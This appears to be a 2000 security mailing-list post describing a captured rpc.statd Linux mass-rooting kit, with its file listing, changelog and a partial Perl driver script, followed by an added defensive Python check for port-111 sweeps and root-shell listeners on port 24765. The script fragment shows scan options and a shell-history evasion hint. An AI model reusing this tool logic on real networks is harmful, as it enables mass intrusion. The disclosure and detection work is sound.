Security Incidents mailing list archives
More info regarding: std.pl, the rpc.statd linux mass rooter
From: marc <marc () ZOUNDS NET>
Date: Fri, 15 Dec 2000 09:36:44 -0600
I've heard different things from a lot of people about this. I do not feel comfortable posting the script itself, but I will post some additional information about it. The perl script does not look like an amateur job, it has some good coding and error checking. And it worked well at finding and compromising boxes, there were quite a few logged when we found it. I will take the full script and send it to CERT, who has requested a copy, but I do not plan to distribute it to anyone else.

-rw-rw-r--   1 marc     marc           19 Nov 29 02:36 .config
-rw-rw-r--   1 marc     marc          105 Nov 30 01:29 207.92.root
-r--------   1 marc     marc          430 Oct 30 01:33 CHANGES
-r--------   1 marc     marc          107 Oct 22 02:26 README
-r-x------   1 marc     marc          320 Oct 13 22:23 config
-r-x------   1 marc     marc        15457 Oct 13 18:33 no
-r-x------   1 marc     marc         7273 Aug  7 21:46 pc
-rwxr-xr-x   1 marc     marc        19438 Oct 14 00:36 st
-rwxrwx---   1 marc     marc         6171 Oct 30 01:32 std.pl

207.92.root: ASCII text
CHANGES:     English text
README:      English text
config:      Bourne shell script text
no:          ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
pc:          ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
st:          ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped
std.pl:      perl commands text

pc is the port scanner. The script has it search for only port 111.
no is a notify daemon. (?)
st is the exploit to root the box and leave the rootshell.
std.pl is the perl script that runs the show.
::::::::::::::
CHANGES
::::::::::::::
Change log

0.2 -> 0.2+p1:
- multiple copies can run on one server now
- cleaned up the script, converted most system() commands into real perl
- added signal handler
- made more verbose errors
- auto random scans now reloops through the file, doesn't spawn children of the script anymore

0.2+p1 -> 0.2+p2:
- fixed a big prob in +p1 that made the script not work

0.2+p2 -> 0.2+p3:
- fixed a minor prob, nothing worth mentioning

::::::::::::::
README
::::::::::::::
Before using std.pl you must run ./config to set required values
or the script will not function properly.

::::::::::::::
std.pl
::::::::::::::
#!/usr/bin/perl
#
# std.pl v0.2+p3 by KraZee - 10.30.00 private
# rpc.statd linux mass rooter [epic]
#
# binds rootshell on port 24765 on exploited hosts
# standard disclaimers apply
#
# DO NOT DISTRIBUTE !! DO NOT DISTRIBUTE

$numofargs=@ARGV;
$option=@ARGV[0];
$prefix=@ARGV[1];
$auto=@ARGV[2];

use File::Basename;
$progname=basename($0);
$SIG{INT}=\&catch_sig;
$hist=$ENV{HISTFILE};
$histlength=length($hist);

print "\nstd.pl v0.2+p3 private - by KraZee\nrpc.statd linux mass rooter\n\n";

if ($histlength != "0" && $hist ne "/dev/null") {
    print "naughty boy you forgot to redirect HISTFILE\n\n";
}

if (not -e ".config") {
    print "* error: configuration not set, run ./config\n\n";
    exit;
} else {
    unless(open (CONFIG, "< .config")) {
        &cleanup;
        die "* error, unable to read configuration: $!\n\n";
    }
    $config="";
    $config=<CONFIG>;
    chop $config;
    ($ip, $childs)=split(" ", $config);
    close(CONFIG);
    if ($ip eq "" || $childs == "") {
...

sub help {
    print "usage: $progname <options> <subnet/iplist>\n\n";
    print "configuration:\n";
    print "server: $ip childs: $childs\n\n";
    print "options:\n";
    print "-s scan class b/c subnet\n";
    print "-f scan ips in ip database (no hostnames!)\n";
    print "-r scan random class b's (specify class a)\n";
    print "use '-r <class a> auto' to loop new scans\n\n";
}
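
A defender-side check built on the two network indicators in the message above (the scanner probes only port 111, and the script header says a root shell is bound on port 24765), as an added example that is not part of the original post or the tool. The iptables-style log format, the `netstat -tln` sample, all addresses, the use of TCP and the sweep threshold are constructed assumptions.

```python
import re
from collections import defaultdict

PORTMAP_PORT = 111      # the only port the post says the scanner probes
ROOTSHELL_PORT = 24765  # port the script header says the root shell binds
SWEEP_THRESHOLD = 3     # assumption: distinct targets before flagging a source

# Constructed iptables-style log lines (TCP assumed; not from the post).
FIREWALL_LOG = """\
Dec 15 02:10:01 fw kernel: IN=eth0 SRC=192.0.2.50 DST=198.51.100.1 PROTO=TCP SPT=4001 DPT=111 SYN
Dec 15 02:10:01 fw kernel: IN=eth0 SRC=192.0.2.50 DST=198.51.100.2 PROTO=TCP SPT=4002 DPT=111 SYN
Dec 15 02:10:02 fw kernel: IN=eth0 SRC=192.0.2.50 DST=198.51.100.3 PROTO=TCP SPT=4003 DPT=111 SYN
Dec 15 02:11:40 fw kernel: IN=eth0 SRC=203.0.113.9 DST=198.51.100.2 PROTO=TCP SPT=1023 DPT=111 SYN
Dec 15 02:12:05 fw kernel: IN=eth0 SRC=192.0.2.50 DST=198.51.100.3 PROTO=TCP SPT=4010 DPT=24765 SYN
"""

# Constructed `netstat -tln` output from a host being examined.
NETSTAT_OUT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:24765           0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
"""

FW_RE = re.compile(r"SRC=(\S+) DST=(\S+) PROTO=TCP .*?DPT=(\d+)")

def analyze_firewall(log, threshold=SWEEP_THRESHOLD):
    """Return (sweepers, followups): sources that probed port 111 on at least
    `threshold` hosts, and (src, dst) pairs where a sweeper also hit 24765."""
    targets, shell_hits = defaultdict(set), []
    for line in log.splitlines():
        m = FW_RE.search(line)
        if not m:
            continue
        src, dst, dport = m.group(1), m.group(2), int(m.group(3))
        if dport == PORTMAP_PORT:
            targets[src].add(dst)
        elif dport == ROOTSHELL_PORT:
            shell_hits.append((src, dst))
    sweepers = {s for s, d in targets.items() if len(d) >= threshold}
    return sorted(sweepers), [(s, d) for s, d in shell_hits if s in sweepers]

def rootshell_listeners(netstat_text, port=ROOTSHELL_PORT):
    """Return local addresses in LISTEN state on the root-shell port."""
    hits = []
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) >= 6 and f[0].startswith("tcp") and f[5] == "LISTEN" and f[3].rsplit(":", 1)[-1] == str(port):
            hits.append(f[3])
    return hits
```

A listener on 24765 with an exposed portmapper on the same host is worth treating as a compromise indicator until proven otherwise; a single probe of port 111 on its own is not.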